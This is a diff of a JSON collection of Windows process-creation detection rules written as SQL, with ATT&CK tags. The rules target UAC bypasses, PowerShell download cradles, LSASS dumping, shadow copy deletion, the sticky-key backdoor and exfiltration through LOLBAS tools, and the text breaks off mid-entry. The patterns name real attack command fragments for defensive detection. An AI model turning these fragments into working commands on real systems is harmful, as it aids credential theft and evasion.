"description": "Detects suspicious process related to rasdial.exe", + "author": "juju4", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%rasdial.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_rasdial_execution.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command", - "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "title": "WMI Persistence - Script Event Consumer", + "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", "status": "test", - "description": "Detects presence of a potentially xor encoded powershell command", - "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", + "description": "Detects WMI script event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001", 
- "attack.t1140", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_xor_commandline.yml" + "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": 
"test", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "New Kernel Driver Via SC.EXE", - "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", - "status": "experimental", - "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Execution of InstallUtil Without Log", + "id": "d042284c-a296-4988-9be5-f424fadcc28c", + "status": "test", + "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion" ], "falsepositives": [ - "Rare legitimate installation of kernel drivers via 
sc.exe" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND NewProcessName LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sc_new_kernel_driver.yml" + "filename": "proc_creation_win_instalutil_no_log_execution.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "title": "HackTool - SharpLDAPmonitor Execution", + "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the SharpLDAPmonitor. 
Which can monitor the creation, deletion and changes to LDAP objects.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.discovery" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" }, { - "title": "Process Reconnaissance Via Wmic.EXE", - "id": "221b251a-357a-49a9-920a-271802777cc0", + "title": "Greedy File Deletion Using Del", + "id": "204b17ae-4007-471b-917b-b917b315c5db", "status": "experimental", - "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", + "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. 
This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_process.yml" + "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "title": "PowerShell Download Pattern", + "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a Powershell process that contains download commands in its command line string", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND 
ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_powershell_download_patterns.yml" }, { - "title": "Shadow Copies Creation Using Operating Systems Utilities", - "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", - "status": "test", - "description": "Shadow Copies creation using operating systems utilities, possible credential access", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "status": "experimental", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.002", - "attack.t1003.003" + "attack.execution", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_shadow_copies_creation.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", + "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", + "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ - "Unknown" + "DataSvcUtil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DataSvcUtil.exe being executed from unfamiliar users should be investigated. 
If known behavior is causing false positives, it can be exempted from the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "status": "test", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious DumpMinitool Execution", + "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE 
'%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", - "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "status": "test", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' 
AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.t1546.008" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "title": "UAC Bypass 
Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", - "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Lolbin Defaultpack.exe Use As Proxy", + "id": 
"b2309017-4235-44fe-b5af-b15363011957", + "status": "experimental", + "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", + "author": "frack113", "tags": [ + "attack.t1218", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_lolbin_defaultpack.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1021.002", - "attack.t1218.011" + "attack.t1218.009" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = 